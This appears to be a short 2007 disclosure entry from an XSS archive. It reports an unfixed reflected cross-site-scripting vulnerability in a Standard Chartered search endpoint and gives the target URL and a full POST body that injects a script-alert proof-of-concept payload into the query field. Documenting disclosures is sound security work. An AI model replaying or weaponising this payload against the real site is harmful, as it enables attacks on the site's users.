Security researcher Drag0nX, has submitted on 23/07/2007 a cross-site-scripting (XSS) vulnerability affecting service.standardchartered.com, which at the time of submission ranked 11303 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/08/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 23/07/2007 |
Date published: 07/08/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Drag0nX |
Domain: service.standardchartered.com |
Category: XSS |
Pagerank: 11303 |
URL: http://service.standardchartered.com/gwssearch_s/scb_query.exe |
POST: method=mainQuery&numresults=100&querythreshold=10%25&QuerySummaryCB=querysummary&batchhits=10&sugges tquery=&fieldStr=&fieldBool=&query=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&btnDone=Make+a+ne w+search&db0=gws_Pakistan |
Click here to view the mirror
|
|
|